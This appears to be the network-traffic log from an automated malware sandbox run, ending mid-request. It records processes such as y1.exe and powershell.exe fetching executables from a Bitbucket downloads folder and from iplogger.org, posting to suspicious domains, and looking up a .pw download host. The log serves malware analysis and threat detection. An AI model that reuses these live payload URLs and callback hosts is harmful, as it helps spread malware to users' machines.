Cookie: AWSALB=EBDpDX/sx0J62ZLQ6QsZk/ylXRu6qYlbOgZPSK3/yX3kKX37a7Xf0fZVBbORNbdiWtnTV/ITWdhYagOVRCrHC6a31EiceWx5AMUyi8yf8RtKXuNxtMdFQ0nqQqWf; AWSALBCORS=EBDpDX/sx0J62ZLQ6QsZk/ylXRu6qYlbOgZPSK3/yX3kKX37a7Xf0fZVBbORNbdiWtnTV/ITWdhYagOVRCrHC6a31EiceWx5AMUyi8yf8RtKXuNxtMdFQ0nqQqWf

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:13 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=l1unESBgqK88BBYfTYkGaKFXEvO/5nbu7Ephrg3OctA4H9yfFG79sBRK4kZAhoLMat/RqqpHTmS7ALYXND/0G98KYnND7mvkoh/uq0pPjsZmU5YOeihOJcy+gmtL; Expires=Wed, 12 May 2021 17:36:13 GMT; Path=/
Set-Cookie: AWSALBCORS=l1unESBgqK88BBYfTYkGaKFXEvO/5nbu7Ephrg3OctA4H9yfFG79sBRK4kZAhoLMat/RqqpHTmS7ALYXND/0G98KYnND7mvkoh/uq0pPjsZmU5YOeihOJcy+gmtL; Expires=Wed, 12 May 2021 17:36:13 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 185
Cache-Control: no-cache
Cookie: AWSALB=l1unESBgqK88BBYfTYkGaKFXEvO/5nbu7Ephrg3OctA4H9yfFG79sBRK4kZAhoLMat/RqqpHTmS7ALYXND/0G98KYnND7mvkoh/uq0pPjsZmU5YOeihOJcy+gmtL; AWSALBCORS=l1unESBgqK88BBYfTYkGaKFXEvO/5nbu7Ephrg3OctA4H9yfFG79sBRK4kZAhoLMat/RqqpHTmS7ALYXND/0G98KYnND7mvkoh/uq0pPjsZmU5YOeihOJcy+gmtL

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:13 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=CBrhBWdTcQefXe1zZ3tdq03RQRlDY3E/FL3wlrFh/MNuru52+dIjqpmh7uZspDts4+aCe2WHy6cxv/TsTaylzS7VFSyC3dUVPs4IqhU48ye1qWbF2YVK6HFmJi8j; Expires=Wed, 12 May 2021 17:36:13 GMT; Path=/
Set-Cookie: AWSALBCORS=CBrhBWdTcQefXe1zZ3tdq03RQRlDY3E/FL3wlrFh/MNuru52+dIjqpmh7uZspDts4+aCe2WHy6cxv/TsTaylzS7VFSyC3dUVPs4IqhU48ye1qWbF2YVK6HFmJi8j; Expires=Wed, 12 May 2021 17:36:13 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 197
Cache-Control: no-cache
Cookie: AWSALB=CBrhBWdTcQefXe1zZ3tdq03RQRlDY3E/FL3wlrFh/MNuru52+dIjqpmh7uZspDts4+aCe2WHy6cxv/TsTaylzS7VFSyC3dUVPs4IqhU48ye1qWbF2YVK6HFmJi8j; AWSALBCORS=CBrhBWdTcQefXe1zZ3tdq03RQRlDY3E/FL3wlrFh/MNuru52+dIjqpmh7uZspDts4+aCe2WHy6cxv/TsTaylzS7VFSyC3dUVPs4IqhU48ye1qWbF2YVK6HFmJi8j

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:14 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=sOuiee+DQiZObxDBHtF9Lh/8TlYmfoQp7lqU0Wa6WYgVtTKFD2BwBnu0ZFl8dWa9zbKe9m2/7tpU/pj8RI7Slb49QJYPXFp5/2PJl8agO0Q0DktoOLGa95FDcg/8; Expires=Wed, 12 May 2021 17:36:14 GMT; Path=/
Set-Cookie: AWSALBCORS=sOuiee+DQiZObxDBHtF9Lh/8TlYmfoQp7lqU0Wa6WYgVtTKFD2BwBnu0ZFl8dWa9zbKe9m2/7tpU/pj8RI7Slb49QJYPXFp5/2PJl8agO0Q0DktoOLGa95FDcg/8; Expires=Wed, 12 May 2021 17:36:14 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 192
Cache-Control: no-cache
Cookie: AWSALB=sOuiee+DQiZObxDBHtF9Lh/8TlYmfoQp7lqU0Wa6WYgVtTKFD2BwBnu0ZFl8dWa9zbKe9m2/7tpU/pj8RI7Slb49QJYPXFp5/2PJl8agO0Q0DktoOLGa95FDcg/8; AWSALBCORS=sOuiee+DQiZObxDBHtF9Lh/8TlYmfoQp7lqU0Wa6WYgVtTKFD2BwBnu0ZFl8dWa9zbKe9m2/7tpU/pj8RI7Slb49QJYPXFp5/2PJl8agO0Q0DktoOLGa95FDcg/8

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:14 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=Tnn541TQFpHd459hWUNF2saFtr4kE5RK7AwKB4xB4Jzi7EBHxlG6HSDrXsj7nzO+iZRx+FTaCsqnatEALjJIaCVWGVzQZfVJw0ZLYf4/kHvZj8VhGiY3C10Trehy; Expires=Wed, 12 May 2021 17:36:14 GMT; Path=/
Set-Cookie: AWSALBCORS=Tnn541TQFpHd459hWUNF2saFtr4kE5RK7AwKB4xB4Jzi7EBHxlG6HSDrXsj7nzO+iZRx+FTaCsqnatEALjJIaCVWGVzQZfVJw0ZLYf4/kHvZj8VhGiY3C10Trehy; Expires=Wed, 12 May 2021 17:36:14 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
GET

https://bitbucket.org/dedenpurdinan/dedenpurdinan/downloads/pub01_test.exe

y1.exe

Remote address:

104.192.141.1:443

Request

GET /dedenpurdinan/dedenpurdinan/downloads/pub01_test.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bitbucket.org

Response

HTTP/1.1 302 Found

Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
Server: nginx
X-Usage-Quota-Remaining: 998583.958
Vary: Accept-Language
X-Usage-Request-Cost: 818.37
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
X-B3-TraceId: d7c21660b15d7f7f
X-Usage-Output-Ops: 0
X-Dc-Location: Micros
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Wed, 05 May 2021 17:36:14 GMT
bbr1repopath: /data/c03/n06/p/vp1734/data/d-129/r-86118129
X-Usage-User-Time: 0.024551
X-Usage-System-Time: 0.000000
Location: https://bbuseruploads.s3.amazonaws.com/3deaabfc-ae97-4c6c-91dd-474d89cc6fb3/downloads/47ee87d7-523d-404a-b255-9138b5d04a98/pub01_test.exe?Signature=fHEfeCoBHbJ6B8%2B4qFN51lJFnag%3D&Expires=1620237796&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=7yUhbctOoas0iTYS9iuAlrlPtmTY1PBk&response-content-disposition=attachment%3B%20filename%3D%22pub01_test.exe%22
X-Served-By: 05c3a4cbbe5c
Expires: Wed, 05 May 2021 17:36:14 GMT
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Static-Version: 6340413fa710
X-Render-Time: 0.0537278652191
Connection: keep-alive
X-Usage-Input-Ops: 0
X-Request-Count: 2425
X-Frame-Options: SAMEORIGIN
X-Version: 6340413fa710
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 195
Cache-Control: no-cache
Cookie: AWSALB=Tnn541TQFpHd459hWUNF2saFtr4kE5RK7AwKB4xB4Jzi7EBHxlG6HSDrXsj7nzO+iZRx+FTaCsqnatEALjJIaCVWGVzQZfVJw0ZLYf4/kHvZj8VhGiY3C10Trehy; AWSALBCORS=Tnn541TQFpHd459hWUNF2saFtr4kE5RK7AwKB4xB4Jzi7EBHxlG6HSDrXsj7nzO+iZRx+FTaCsqnatEALjJIaCVWGVzQZfVJw0ZLYf4/kHvZj8VhGiY3C10Trehy

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:14 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=wbrpl+GfIxlhva3Fwvrixu/JHn92wZ0uWLS1UPRQQo1aYem5chNIPcQXoUmXWH5ZLJqz8Lj99U1O7TmfiF6saE4jxk9PFbEgJxGFI2nM5Ziov1p4m8qcUfas2LJI; Expires=Wed, 12 May 2021 17:36:14 GMT; Path=/
Set-Cookie: AWSALBCORS=wbrpl+GfIxlhva3Fwvrixu/JHn92wZ0uWLS1UPRQQo1aYem5chNIPcQXoUmXWH5ZLJqz8Lj99U1O7TmfiF6saE4jxk9PFbEgJxGFI2nM5Ziov1p4m8qcUfas2LJI; Expires=Wed, 12 May 2021 17:36:14 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
DNS

www.iyiqian.com

powershell.exe

Remote address:

8.8.8.8:53

Request

www.iyiqian.com

IN A

Response

www.iyiqian.com

IN A

103.155.92.58
GET

http://www.iyiqian.com/

Remote address:

103.155.92.58:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.iyiqian.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 16
Connection: keep-alive
X-Powered-By: PHP/5.6.40
DNS

bbuseruploads.s3.amazonaws.com

powershell.exe

Remote address:

8.8.8.8:53

Request

bbuseruploads.s3.amazonaws.com

IN A

Response

bbuseruploads.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN A

52.216.171.187
GET

https://bbuseruploads.s3.amazonaws.com/3deaabfc-ae97-4c6c-91dd-474d89cc6fb3/downloads/47ee87d7-523d-404a-b255-9138b5d04a98/pub01_test.exe?Signature=fHEfeCoBHbJ6B8%2B4qFN51lJFnag%3D&Expires=1620237796&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=7yUhbctOoas0iTYS9iuAlrlPtmTY1PBk&response-content-disposition=attachment%3B%20filename%3D%22pub01_test.exe%22

y1.exe

Remote address:

52.216.171.187:443

Request

GET /3deaabfc-ae97-4c6c-91dd-474d89cc6fb3/downloads/47ee87d7-523d-404a-b255-9138b5d04a98/pub01_test.exe?Signature=fHEfeCoBHbJ6B8%2B4qFN51lJFnag%3D&Expires=1620237796&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=7yUhbctOoas0iTYS9iuAlrlPtmTY1PBk&response-content-disposition=attachment%3B%20filename%3D%22pub01_test.exe%22 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bbuseruploads.s3.amazonaws.com

Response

HTTP/1.1 200 OK

x-amz-id-2: ao+18uwvk3n7LwtMK4Kz3bxhzAT3BnYP1z/5pNPX2dzsj4407ej3az/duwMPibAUaUdZ66nY0to=
x-amz-request-id: QAP95EM314D4HZST
Date: Wed, 05 May 2021 17:36:15 GMT
Last-Modified: Wed, 21 Apr 2021 07:35:06 GMT
ETag: "dac476eb95c28c5cc52eabaf262ac97d"
x-amz-version-id: 7yUhbctOoas0iTYS9iuAlrlPtmTY1PBk
Content-Disposition: attachment; filename="pub01_test.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Content-Length: 2919592
Server: AmazonS3
DNS

www.hnsqyyjt.com

powershell.exe

Remote address:

8.8.8.8:53

Request

www.hnsqyyjt.com

IN A

Response

www.hnsqyyjt.com

IN A

188.225.87.175
POST

http://www.hnsqyyjt.com/Home/Index/lkdinl

Remote address:

188.225.87.175:80

Request

POST /Home/Index/lkdinl HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.hnsqyyjt.com
Content-Length: 285
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Set-Cookie: PHPSESSID=1b0f9i520u88n7ta7t3ovho7s3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 201
Cache-Control: no-cache
Cookie: AWSALB=wbrpl+GfIxlhva3Fwvrixu/JHn92wZ0uWLS1UPRQQo1aYem5chNIPcQXoUmXWH5ZLJqz8Lj99U1O7TmfiF6saE4jxk9PFbEgJxGFI2nM5Ziov1p4m8qcUfas2LJI; AWSALBCORS=wbrpl+GfIxlhva3Fwvrixu/JHn92wZ0uWLS1UPRQQo1aYem5chNIPcQXoUmXWH5ZLJqz8Lj99U1O7TmfiF6saE4jxk9PFbEgJxGFI2nM5Ziov1p4m8qcUfas2LJI

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:14 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=Ef8pN22ejsSLX2bpxD+oo3joAPkAaEmoXX9ZfN4fVSP8NZNgibwyqnqZ2kEEP7kUfir4/+7GjUok9yzRxio1j1guy+xFS+NUB/e6bwExERb+qVQEfFlYRBoZuDtX; Expires=Wed, 12 May 2021 17:36:14 GMT; Path=/
Set-Cookie: AWSALBCORS=Ef8pN22ejsSLX2bpxD+oo3joAPkAaEmoXX9ZfN4fVSP8NZNgibwyqnqZ2kEEP7kUfir4/+7GjUok9yzRxio1j1guy+xFS+NUB/e6bwExERb+qVQEfFlYRBoZuDtX; Expires=Wed, 12 May 2021 17:36:14 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 192
Cache-Control: no-cache
Cookie: AWSALB=Ef8pN22ejsSLX2bpxD+oo3joAPkAaEmoXX9ZfN4fVSP8NZNgibwyqnqZ2kEEP7kUfir4/+7GjUok9yzRxio1j1guy+xFS+NUB/e6bwExERb+qVQEfFlYRBoZuDtX; AWSALBCORS=Ef8pN22ejsSLX2bpxD+oo3joAPkAaEmoXX9ZfN4fVSP8NZNgibwyqnqZ2kEEP7kUfir4/+7GjUok9yzRxio1j1guy+xFS+NUB/e6bwExERb+qVQEfFlYRBoZuDtX

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:15 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=FE6KFI6WMLSd1RasH/8mAhVaPEj9gtDkYEwM86VuYGFncFAaEJjfNDmI4t0Buo6bTV03r9n+D3ZClxoM84WTMQ1bxrZEnt4+RC7DV3qkmRgSyKsLXep/s5mwOiLm; Expires=Wed, 12 May 2021 17:36:15 GMT; Path=/
Set-Cookie: AWSALBCORS=FE6KFI6WMLSd1RasH/8mAhVaPEj9gtDkYEwM86VuYGFncFAaEJjfNDmI4t0Buo6bTV03r9n+D3ZClxoM84WTMQ1bxrZEnt4+RC7DV3qkmRgSyKsLXep/s5mwOiLm; Expires=Wed, 12 May 2021 17:36:15 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 194
Cache-Control: no-cache
Cookie: AWSALB=FE6KFI6WMLSd1RasH/8mAhVaPEj9gtDkYEwM86VuYGFncFAaEJjfNDmI4t0Buo6bTV03r9n+D3ZClxoM84WTMQ1bxrZEnt4+RC7DV3qkmRgSyKsLXep/s5mwOiLm; AWSALBCORS=FE6KFI6WMLSd1RasH/8mAhVaPEj9gtDkYEwM86VuYGFncFAaEJjfNDmI4t0Buo6bTV03r9n+D3ZClxoM84WTMQ1bxrZEnt4+RC7DV3qkmRgSyKsLXep/s5mwOiLm

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:15 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=d0QZ6GlXgF3edbPq/6tWZc37db1E7v2Q8NQ/BNfzsB9CSjYj6v2tTEy9+suPuKuMhnNg8WMBnvho8bzY+0PSKYIdbb0ptXGitZ6lEGXPn8+m1W26CWCozsF4seOn; Expires=Wed, 12 May 2021 17:36:15 GMT; Path=/
Set-Cookie: AWSALBCORS=d0QZ6GlXgF3edbPq/6tWZc37db1E7v2Q8NQ/BNfzsB9CSjYj6v2tTEy9+suPuKuMhnNg8WMBnvho8bzY+0PSKYIdbb0ptXGitZ6lEGXPn8+m1W26CWCozsF4seOn; Expires=Wed, 12 May 2021 17:36:15 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 192
Cache-Control: no-cache
Cookie: AWSALB=d0QZ6GlXgF3edbPq/6tWZc37db1E7v2Q8NQ/BNfzsB9CSjYj6v2tTEy9+suPuKuMhnNg8WMBnvho8bzY+0PSKYIdbb0ptXGitZ6lEGXPn8+m1W26CWCozsF4seOn; AWSALBCORS=d0QZ6GlXgF3edbPq/6tWZc37db1E7v2Q8NQ/BNfzsB9CSjYj6v2tTEy9+suPuKuMhnNg8WMBnvho8bzY+0PSKYIdbb0ptXGitZ6lEGXPn8+m1W26CWCozsF4seOn

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:16 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=JHD5pB2xRcgQmP65acjzS7zlsCE3hYk0WFzPCU3K2+v+o+noMeJA8/veJFJelqjeTEcO7rj/cUwn8wkuC0ACWxTl+U52Qo4BADYYKUxnLJV4ipOUoJ52M/kxobk9; Expires=Wed, 12 May 2021 17:36:16 GMT; Path=/
Set-Cookie: AWSALBCORS=JHD5pB2xRcgQmP65acjzS7zlsCE3hYk0WFzPCU3K2+v+o+noMeJA8/veJFJelqjeTEcO7rj/cUwn8wkuC0ACWxTl+U52Qo4BADYYKUxnLJV4ipOUoJ52M/kxobk9; Expires=Wed, 12 May 2021 17:36:16 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 194
Cache-Control: no-cache
Cookie: AWSALB=JHD5pB2xRcgQmP65acjzS7zlsCE3hYk0WFzPCU3K2+v+o+noMeJA8/veJFJelqjeTEcO7rj/cUwn8wkuC0ACWxTl+U52Qo4BADYYKUxnLJV4ipOUoJ52M/kxobk9; AWSALBCORS=JHD5pB2xRcgQmP65acjzS7zlsCE3hYk0WFzPCU3K2+v+o+noMeJA8/veJFJelqjeTEcO7rj/cUwn8wkuC0ACWxTl+U52Qo4BADYYKUxnLJV4ipOUoJ52M/kxobk9

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:16 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=KRiJ4r+WcJ6ubLs5BkdUWDFh4WsfAge1Oo76ZUr9/j55Kr77D6Uvf2a7Z46Kcx2zzFLcUoY+tvshfLw02XBoKM6duENs3FDRUgLJKFhAYziROm4ew4gZx75QQXwE; Expires=Wed, 12 May 2021 17:36:16 GMT; Path=/
Set-Cookie: AWSALBCORS=KRiJ4r+WcJ6ubLs5BkdUWDFh4WsfAge1Oo76ZUr9/j55Kr77D6Uvf2a7Z46Kcx2zzFLcUoY+tvshfLw02XBoKM6duENs3FDRUgLJKFhAYziROm4ew4gZx75QQXwE; Expires=Wed, 12 May 2021 17:36:16 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 210
Cache-Control: no-cache
Cookie: AWSALB=KRiJ4r+WcJ6ubLs5BkdUWDFh4WsfAge1Oo76ZUr9/j55Kr77D6Uvf2a7Z46Kcx2zzFLcUoY+tvshfLw02XBoKM6duENs3FDRUgLJKFhAYziROm4ew4gZx75QQXwE; AWSALBCORS=KRiJ4r+WcJ6ubLs5BkdUWDFh4WsfAge1Oo76ZUr9/j55Kr77D6Uvf2a7Z46Kcx2zzFLcUoY+tvshfLw02XBoKM6duENs3FDRUgLJKFhAYziROm4ew4gZx75QQXwE

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:16 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=EgfuKySE9mdm2n45t7FE/Mc2c8fvV+LPC5MpQpGikyalM2b27RqxdipW/lbMobx5++rYoQCdgrcpazarVka1YwyzfZpVyhAwcV/88EaxePianzA1+1Tve311OP6k; Expires=Wed, 12 May 2021 17:36:16 GMT; Path=/
Set-Cookie: AWSALBCORS=EgfuKySE9mdm2n45t7FE/Mc2c8fvV+LPC5MpQpGikyalM2b27RqxdipW/lbMobx5++rYoQCdgrcpazarVka1YwyzfZpVyhAwcV/88EaxePianzA1+1Tve311OP6k; Expires=Wed, 12 May 2021 17:36:16 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
GET

https://iplogger.org/1BMng7.exe

y1.exe

Remote address:

88.99.66.31:443

Request

GET /1BMng7.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:16 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=aopiiqone8lqm2vaiug6usvpa7; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=258812014; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 1
whoami: acce61361a3dee677653fa2909f29530202335835c71031ba4dff50682ae5de8
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 211
Cache-Control: no-cache
Cookie: AWSALB=EgfuKySE9mdm2n45t7FE/Mc2c8fvV+LPC5MpQpGikyalM2b27RqxdipW/lbMobx5++rYoQCdgrcpazarVka1YwyzfZpVyhAwcV/88EaxePianzA1+1Tve311OP6k; AWSALBCORS=EgfuKySE9mdm2n45t7FE/Mc2c8fvV+LPC5MpQpGikyalM2b27RqxdipW/lbMobx5++rYoQCdgrcpazarVka1YwyzfZpVyhAwcV/88EaxePianzA1+1Tve311OP6k

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:17 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=JAN8yFdx1TRHdASUnGMvjqtJNW5A2XTFkMVnVnY/gf3Cxgg44+MY0w3911G7PiPSaDmhU528hUd+cxsaTYgriog1NzRSI+/5ftZkvOOor3Es5aHOcs/p3ToRHXbV; Expires=Wed, 12 May 2021 17:36:17 GMT; Path=/
Set-Cookie: AWSALBCORS=JAN8yFdx1TRHdASUnGMvjqtJNW5A2XTFkMVnVnY/gf3Cxgg44+MY0w3911G7PiPSaDmhU528hUd+cxsaTYgriog1NzRSI+/5ftZkvOOor3Es5aHOcs/p3ToRHXbV; Expires=Wed, 12 May 2021 17:36:17 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 193
Cache-Control: no-cache
Cookie: AWSALB=JAN8yFdx1TRHdASUnGMvjqtJNW5A2XTFkMVnVnY/gf3Cxgg44+MY0w3911G7PiPSaDmhU528hUd+cxsaTYgriog1NzRSI+/5ftZkvOOor3Es5aHOcs/p3ToRHXbV; AWSALBCORS=JAN8yFdx1TRHdASUnGMvjqtJNW5A2XTFkMVnVnY/gf3Cxgg44+MY0w3911G7PiPSaDmhU528hUd+cxsaTYgriog1NzRSI+/5ftZkvOOor3Es5aHOcs/p3ToRHXbV

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:17 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=zD5d3sI8kmBvQjsCQeTekSPf6rf+B6f4L3AwSDDvpElJC979WaUby2TNjE51uIp3JnaZRD6fNE0sBWVgBvAnEqkyD0ZDR+M7LI3/KFGUH+/ktgXeyaA9HmMOI7dE; Expires=Wed, 12 May 2021 17:36:17 GMT; Path=/
Set-Cookie: AWSALBCORS=zD5d3sI8kmBvQjsCQeTekSPf6rf+B6f4L3AwSDDvpElJC979WaUby2TNjE51uIp3JnaZRD6fNE0sBWVgBvAnEqkyD0ZDR+M7LI3/KFGUH+/ktgXeyaA9HmMOI7dE; Expires=Wed, 12 May 2021 17:36:17 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 207
Cache-Control: no-cache
